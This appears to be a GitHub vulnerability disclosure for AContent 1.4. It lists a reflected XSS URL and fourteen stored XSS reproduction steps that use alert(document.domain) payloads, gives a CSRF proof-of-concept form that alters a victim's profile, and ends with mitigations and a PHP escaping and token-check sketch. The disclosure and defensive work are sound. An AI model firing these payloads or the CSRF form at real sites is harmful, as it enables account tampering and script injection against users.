XSS and CSRF issues on v1.4
Hello... I have found XSS and CSRF issues in atutor/AContent v1.4. I used the AContent 1.4 Demo on your official website. Please let me know if you need additional information. I hope this is the right channel to disclose security issues, because you requested that any bugs be posted to this GitHub page. Regards.
Findings
XSS (Reflected)
https://atutordemos.000webhostapp.com/acontent/documentation/index.php?p="><script>alert(document.domain)</script>
XSS (Stored)
1 (editor/edit_content_folder.php)
- In the Content Folder Title Field, please enter `<script>alert(document.domain)</script>` and then press Enter or click the Save Button
- Please click the Delete Content Icon to trigger the JS alert
2 (editor/edit_content.php)
- In the Title Field, please enter `<script>alert(document.domain)</script>` and then press Enter or click the Save Button
- Please click the Delete Content Icon to trigger the JS alert
3 (editor/edit_content.php)
- In the Title Field with HTML format selected, please enter any clickable name. For example, `<script>test</script>`.
- In the Body, please enter `<script>alert(document.domain)</script>`
- Click the Preview Button to trigger the JS alert
- Click the Save Button
- Click `<script>test</script>` to trigger the JS alert again
4 (tests/edit_test.php)
- In the Title Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button to trigger the JS alert
5 (tests/edit_question_likert.php)
- In the Question Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking the Preview or Delete Button
- Every time we open the Question Bank (tests/question_db.php), the JS alert is also triggered
6 (tests/create_question_matchingdd.php)
- In the Question Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button
- We can trigger the JS alert by clicking the Preview Button
7 (tests/create_question_matching.php)
- In the Question Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button
- We can trigger the JS alert by clicking the Preview Button
8 (tests/create_question_multianswer.php)
- In the Question Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button
- We can trigger the JS alert by clicking the Preview Button
9 (tests/create_question_multichoice.php)
- In the Question Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button
- We can trigger the JS alert by clicking the Preview Button
10 (tests/create_question_long.php)
- In the Question Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button
- We can trigger the JS alert by clicking the Preview Button
11 (tests/edit_question_ordering.php)
- In the Question Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button
- We can trigger the JS alert by clicking the Preview Button
12 (tests/edit_question_truefalse.php)
- In the Statement Field, please enter `<script>alert(document.domain)</script>`
- Click the Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking the Preview or Delete Button
13 (tests/question_cats_manage.php)
- In the Title Field, please enter `<script>alert(document.domain)</script>`
- Press Enter or click the Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking the Delete Button
14 (course/course_property.php)
- In the Title Field, please enter `<script>alert(document.domain)</script>`
- Press Enter or click the Save Button to trigger the JS alert
CSRF
- Log in at the official website.
- Save the HTML code below and give it a name, e.g. CSRF_Payload.html.
- Open and execute the payload in the same browser by clicking the CLICK ME Button

```html
<html>
<form method="post" action="https://atutordemos.000webhostapp.com/acontent/profile/index.php" name="form">
<input name="password_error" type="hidden">
<input type="hidden" name="form_password_hidden" value="">
<input id="first_name" name="first_name" type="hidden" value="FIRST NAME">
<input id="last_name" name="last_name" type="hidden" value="LAST NAME">
<input type="checkbox" style="display:none" name="is_author" id="is_author" checked="checked" onclick="if (this.checked) jQuery('#table_is_author').show('slow'); else jQuery('#table_is_author').hide('slow');">
<input id="organization" name="organization" type="hidden" size="50" maxlength="100" value="ORGANIZATION">
<input id="phone" name="phone" type="hidden" size="30" maxlength="30" value="PHONE">
<input id="address" name="address" type="hidden" size="50" maxlength="100" value="ADDRESS">
<input id="city" name="city" type="hidden" size="30" maxlength="30" value="CITY">
<input id="province" name="province" type="hidden" size="30" maxlength="30" value="PROVINCE">
<input id="country" name="country" type="hidden" size="30" maxlength="30" value="COUNTRY">
<input id="postal_code" name="postal_code" type="hidden" size="10" maxlength="10" value="POSTAL CODE">
<!-- Click the button to execute this CSRF Payload -->
<input type="submit" name="submit" value="CLICK ME" class="submit">
</form>
</html>
```
Suggested Mitigations
- For the XSS issues, we can use input validation and an escape function for all user-supplied inputs. I see you made special characters become like `<script>alert(document.domain)</script>` in certain places, but not in many other places, which are therefore still vulnerable to XSS.
- For the CSRF issue, we can use a CSRF Token. It would be better if Change Password and Change Email Address also used a CSRF Token.
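The two mitigations above, sketched as an added PHP example that is not AContent's own code: every user-supplied value (the stored titles and the reflected `p` parameter from the report) is escaped at output time with `htmlspecialchars`, and the profile form carries a per-session CSRF token that is verified in constant time before any update. The helper names and the `csrf_token` field name are assumptions.

```php
<?php
// Added example, not AContent's own code: output escaping for the fields named in
// the report plus a session CSRF token for profile/index.php. Names are assumptions.

function ensure_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
}

// Escape every user-supplied value at output time. ENT_QUOTES also covers
// attribute context (value="..."), not only element text.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// One random token per session, embedded in every state-changing form.
function csrf_token(): string
{
    ensure_session();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}
// A page on another origin cannot read the session token, so a missing or
// mismatched token means the POST was not issued by our own form.
function csrf_check(?string $submitted): bool
{
    ensure_session();
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}
// Reject the profile update before anything is written.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrf_check($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token.');
}
// Constructed sample input: a stored title and the reflected ?p= parameter.
$title = '<script>alert(document.domain)</script>';
$p     = $_GET['p'] ?? '"><script>alert(document.domain)</script>';
?>
<h1><?= html_escape($title) ?></h1>
<p>Page: <?= html_escape($p) ?></p>
<form method="post" action="/acontent/profile/index.php">
  <input type="hidden" name="csrf_token" value="<?= html_escape(csrf_token()) ?>">
  <input type="submit" value="Save">
</form>
```

With the token check in place, the cross-site form from the CSRF section is rejected with 403 because it cannot include a value that only the victim's own session knows; the escaped title and `p` render as literal text instead of executing.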